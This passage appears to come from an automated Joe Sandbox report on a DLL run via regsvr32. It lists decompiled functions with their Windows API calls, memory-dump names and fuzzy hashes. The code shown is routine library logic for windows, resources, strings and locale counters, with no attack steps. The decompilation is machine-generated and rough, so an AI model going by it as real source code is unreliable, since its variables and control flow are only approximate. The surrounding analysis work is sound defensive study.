				return E1001FBB5(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10010FB7
RegCloseKey.ADVAPI32(00000000), ref: 10010FC0
_swprintf.LIBCMT ref: 10010FDD
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10010FEE

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWrite_swprintf
String ID:
API String ID: 4210924919-0
Opcode ID: 75749d2b2382c0398083ba7cb92d29f59f37c4d48f9a02f992366f8d0876f9a2
Instruction ID: 3a2604f4cfee837da5f4817c2b18a2a2174cbb3477f90de8d09310f3c9904bd3
Opcode Fuzzy Hash: 75749d2b2382c0398083ba7cb92d29f59f37c4d48f9a02f992366f8d0876f9a2
Instruction Fuzzy Hash: 5001C07260031AABDB11DF648D86FBF77ACEF48704F400429FA01EB152DBB4E90587A0

Uniqueness

Uniqueness Score: -1.00%

Function 10016DC9 Relevance: 6.1, APIs: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E10016DC9(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, RECT* _a8, int _a12) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				intOrPtr _t35;

				_t35 = _a4;
				E1000EC55( &_v12, __eflags,  *((intOrPtr*)(_t35 - 0xb0)));
				if(_a8 != 0) {
					IntersectRect( &_v28, _a8, _t35 - 0x9c);
					EqualRect( &_v28, _a8);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(IsRectEmpty( &_v28) == 0) {
					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t35 - 0xac)) + 0x20)) + 0x20),  &_v28, _a12);
				}
				if(_v8 != 0) {
					_push(_v12);
					_push(0);
					E1000E519();
				}
				return 0;
			}

APIs

IntersectRect.USER32 ref: 10016E08
EqualRect.USER32 ref: 10016E15
IsRectEmpty.USER32 ref: 10016E1F
InvalidateRect.USER32(?,?,?), ref: 10016E3C

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$EmptyEqualIntersectInvalidate
String ID:
API String ID: 3354205298-0
Opcode ID: 2557517eccbb9696ab163556630543b7d1cc2db7da66443bf135cd333d30a12f
Instruction ID: 49a1a39e4a335cb1035e2ca36527126fc36f233e68e158b4c8e2f4d27b7ad01c
Opcode Fuzzy Hash: 2557517eccbb9696ab163556630543b7d1cc2db7da66443bf135cd333d30a12f
Instruction Fuzzy Hash: 5E11EC7690011AEFDF02DF94CC89FDE7BB9FF08349F0080A1FA05AA011D7719A559B60

Uniqueness

Uniqueness Score: -1.00%

Function 10011A48 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E10011A48(void* __ecx, void* __eflags) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t11;
				int _t13;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;
				void* _t34;
				void* _t35;

				_push(__ecx);
				_t23 = __ecx;
				if(E10004D4A(__eflags, 0x10) == 0) {
					_t30 = 0;
					__eflags = 0;
				} else {
					_t30 = E10011A2B(_t9);
				}
				_t11 = GetCurrentProcess();
				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
				_t34 = _t32;
				if(_t13 == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					E1001C4CE(_t23, _t30, _t34, _t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}

APIs

Part of subcall function 10004D4A: _malloc.LIBCMT ref: 10004D64

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10011A7A
GetCurrentProcess.KERNEL32(?,00000000), ref: 10011A80
DuplicateHandle.KERNEL32(00000000), ref: 10011A83
GetLastError.KERNEL32(?), ref: 10011A9E

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
String ID:
API String ID: 3704204646-0
Opcode ID: 48c76622b07e1260fdb1534259b3491da0b71c0db79951e57b58b6256fd15158
Instruction ID: ab2ce72c394f12d9cf7e836f78522521826892dae628e20e317a2ba2e4d81c76
Opcode Fuzzy Hash: 48c76622b07e1260fdb1534259b3491da0b71c0db79951e57b58b6256fd15158
Instruction Fuzzy Hash: A9017C76700204AFEB15DBA5CC89F9A7FA8DF88750F158415F905CF252EA70EC40DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000670D Relevance: 6.0, APIs: 4, Instructions: 50
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000670D(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* _t16;
				int _t17;
				int _t18;
				struct HWND__* _t19;
				intOrPtr _t25;
				intOrPtr _t33;
				void* _t35;

				_t32 = __edi;
				_t35 = __ecx;
				_t25 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t25 == 0) {
					__eflags =  *((intOrPtr*)(__ecx + 0x14));
					if(__eflags == 0) {
						L3:
						_t17 = E10004E6E(0, _t25, _t32, _t35, _t39);
						L4:
						asm("sbb edx, edx");
						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
						L11:
						 *((intOrPtr*)(_t35 + 0x18)) = 1;
						return _t18;
					}
					__eflags = _a4;
					if(_a4 == 0) {
						_push(__edi);
						_t33 =  *((intOrPtr*)(__ecx + 0x14));
						_t19 = GetFocus();
						__eflags = _t19 -  *(_t33 + 0x20);
						if(_t19 ==  *(_t33 + 0x20)) {
							SendMessageA( *(E1000A8F0(0, _t25, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
						}
					}
					_t18 = E1000EFCE( *((intOrPtr*)(_t35 + 0x14)), _a4);
					goto L11;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					_t17 =  *(__ecx + 8);
					_t39 = _t17 -  *((intOrPtr*)(__ecx + 0x20));
					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
						goto L4;
					}
					goto L3;
				}
				return _t16;
			}

APIs

EnableMenuItem.USER32 ref: 10006745

Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F

GetFocus.USER32 ref: 1000675C
GetParent.USER32(?), ref: 1000676A
SendMessageA.USER32 ref: 1000677D

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
String ID:
API String ID: 3849708097-0
Opcode ID: da181488fd32ae85599c137ac0e4151e4cf157de9effc839c6b85ff350a25f58
Instruction ID: e2afc09dcdd242cfcc452f6720a74c3cb54d3460b69826f3dc14470d92f8e7be
Opcode Fuzzy Hash: da181488fd32ae85599c137ac0e4151e4cf157de9effc839c6b85ff350a25f58
Instruction Fuzzy Hash: 88118E71504611EFE721DF20CC8881AB7F6FF88399B21CA2DF15A46969CB30BC44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000B21C Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E1000B21C(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				struct HWND__* _t25;

				_t23 = __ecx;
				_t22 = __ebx;
				_t24 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t25 = _t16;
					if(_t25 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t25, _a8, _a12, _a16);
					} else {
						_t20 = E1000A917(_t23, _t24, _t25, __eflags, _t25);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E1000AF41(_t22, _t24, _t25, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t25);
						__eflags = _t18;
						if(_t18 != 0) {
							E1000B21C(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t25, 2);
				}
				return _t16;
			}

APIs

GetTopWindow.USER32(?), ref: 1000B22A
GetTopWindow.USER32(00000000), ref: 1000B269
GetWindow.USER32(00000000,00000002), ref: 1000B287

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: e0b1c7dcaef5420272ec71e23bd9130895c4420cb30c111c889f194c57433dfc
Instruction ID: bb9f297338e09c47c4769c98d14c4203ded29529c07ae9fe16b63de4f6ec589b
Opcode Fuzzy Hash: e0b1c7dcaef5420272ec71e23bd9130895c4420cb30c111c889f194c57433dfc
Instruction Fuzzy Hash: 0301E93600191ABBEF13AF908C05E9F3B65EF493D0F018114FA1055065C736CA61EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 10010AF2 Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E10010AF2(short* _a4) {
				char* _v0;
				int _v8;
				int _v16;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t6;
				char* _t7;
				void* _t12;
				char* _t13;
				void* _t15;
				void* _t16;
				short* _t20;

				_t20 = _a4;
				if(_t20 != 0) {
					__imp__#7(_t20, _t16, _t12);
					_v8 = _t6;
					_t7 = WideCharToMultiByte(0, 0, _t20, _t6, 0, 0, 0, 0);
					_v0 = _t7;
					__imp__#150(0, _t7);
					_t13 = _t7;
					__eflags = _t13;
					if(__eflags == 0) {
						E10004E3A(_t13, _t15, WideCharToMultiByte, 0, __eflags);
					}
					WideCharToMultiByte(0, 0, _t20, _v16, _t13, _v8, 0, 0);
					return _t13;
				}
				return 0;
			}

0x10010af4
0x10010afd
0x10010b06
0x10010b1a
0x10010b1e
0x10010b22
0x10010b26
0x10010b2c
0x10010b2e
0x10010b30
0x10010b32
0x10010b32
0x10010b45
0x00000000
0x10010b4a
0x00000000

APIs

SysStringLen.OLEAUT32(?), ref: 10010B06
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1001D033,00000000,00000018,1001D379), ref: 10010B1E
SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 10010B26
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1001D033,00000000,00000018,1001D379), ref: 10010B45

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Byte$CharMultiStringWide$Alloc
String ID:
API String ID: 3384502665-0
Opcode ID: 2aaaeee83b87f37a7c2fa2b797ecf6177c1475c8e7f20f5b86dc05104e7f5898
Instruction ID: c024efa3420e83baabe874ecab196389fa921329a1610a927b319e642033d1fa
Opcode Fuzzy Hash: 2aaaeee83b87f37a7c2fa2b797ecf6177c1475c8e7f20f5b86dc05104e7f5898
Instruction Fuzzy Hash: BCF0127120A2747FD2225B668C8CC9BBF9CFF8A2E97124529F58996101D6759900C6F1

Uniqueness

Uniqueness Score: -1.00%

Function 1000ABDB Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1000ABDB(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				void* _t18;

				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t15 = GetTopWindow;
				_t16 = _t9;
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L10;
						}
						_t10 = E1000ABDB(_t13, _t14, _t17, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E1000A8F0(_t13, _t14, _t18);
						}
						_t10 = E1000A917(_t14, _t15, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E1000ABDB(__ebx, _t14, _t16, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}

APIs

GetDlgItem.USER32 ref: 1000ABE6
GetTopWindow.USER32(00000000), ref: 1000ABF9

Part of subcall function 1000ABDB: GetWindow.USER32(00000000,00000002), ref: 1000AC40

GetTopWindow.USER32(?), ref: 1000AC29

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: ce071e9538a02d42f810a6b21320928da7b329cf863030978907d6d72f575913
Instruction ID: cd43aa0fe87982c1d24f281b623a533cfa4df9f459eb7cb89b98fbb4107c1cf3
Opcode Fuzzy Hash: ce071e9538a02d42f810a6b21320928da7b329cf863030978907d6d72f575913
Instruction Fuzzy Hash: F7016236501666ABFB239F518D00E8F3A99EF0B3E0F038220FD005612AE731D9D19AE5

Uniqueness

Uniqueness Score: -1.00%

Function 1002BCC5 Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1002BCC5(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;
				void* _t29;

				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E1002B5C2(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E1002B6AE(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E1002BBCD(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E1002BB14(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

APIs

__cftof_l.LIBCMT ref: 1002BCE9

Part of subcall function 1002BB14: __fltout2.LIBCMT ref: 1002BB3E

__cftog_l.LIBCMT ref: 1002BD0F
__cftoe_l.LIBCMT ref: 1002BD41

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction ID: 3b922080ff75e98142c472849b9f5e6d9f0d2bf6741c52107cc94376e2c1784d
Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction Fuzzy Hash: C9014B3680058EBBCF129E84EC418EE3F62FF19390F948455FE1959031D736D9B1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 10029AD3 Relevance: 6.0, APIs: 4, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E10029AD3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x10041648);
				E10022714(__ebx, __edi, __esi);
				_t31 = E10025E70(__edx, __edi, _t35);
				_t15 =  *0x100461fc; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E10023FE8(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10046100; // 0x42f1300
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x10045cd8;
								if(__eflags != 0) {
									_push(_t33);
									E1001F6F4(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x10046100; // 0x42f1300
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x10046100; // 0x42f1300
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E10029B6E();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E10020BB5(_t25, _t29, _t31, 0x20);
				}
				return E10022759(_t33);
			}

APIs

Part of subcall function 10025E70: __getptd_noexit.LIBCMT ref: 10025E71
Part of subcall function 10025E70: __amsg_exit.LIBCMT ref: 10025E7E

__amsg_exit.LIBCMT ref: 10029AFF
__lock.LIBCMT ref: 10029B0F
InterlockedDecrement.KERNEL32(?), ref: 10029B2C
InterlockedIncrement.KERNEL32(042F1300), ref: 10029B57

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: 56d065f265e4a70fe3f7ed656445acff29df91b79a35f532556a78a06cb7d754
Instruction ID: 7e2233ef4788b528b7c8923621eb479d41e657301323debbe484897fd832dd33
Opcode Fuzzy Hash: 56d065f265e4a70fe3f7ed656445acff29df91b79a35f532556a78a06cb7d754
Instruction Fuzzy Hash: 8D01D235900721EBDB43DB64B94574EB3A0FF09790F954014E804AB6A2D774BD81DFDA

Uniqueness

Uniqueness Score: -1.00%

Function 1000D4E7 Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000D4E7(void* __ecx, CHAR* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HINSTANCE__* _t17;
				void* _t18;

				_t14 = 0;
				_t11 = 0;
				_t19 = _a4;
				_t18 = __ecx;
				if(_a4 == 0) {
					L4:
					_t16 = E1000D09E(_t11, _t18, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t16;
				}
				_t17 =  *(E1000EC09(0, 0, _t15, _t19) + 0xc);
				_t8 = FindResourceA(_t17, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t17, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1000D509
LoadResource.KERNEL32(?,00000000,?,?,?,?,10007D86,?,?,10004C5C,771F5646), ref: 1000D515
LockResource.KERNEL32(00000000,?,?,?,?,10007D86,?,?,10004C5C,771F5646), ref: 1000D522
FreeResource.KERNEL32(00000000,?,?,?,?,10007D86,?,?,10004C5C,771F5646), ref: 1000D53D

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

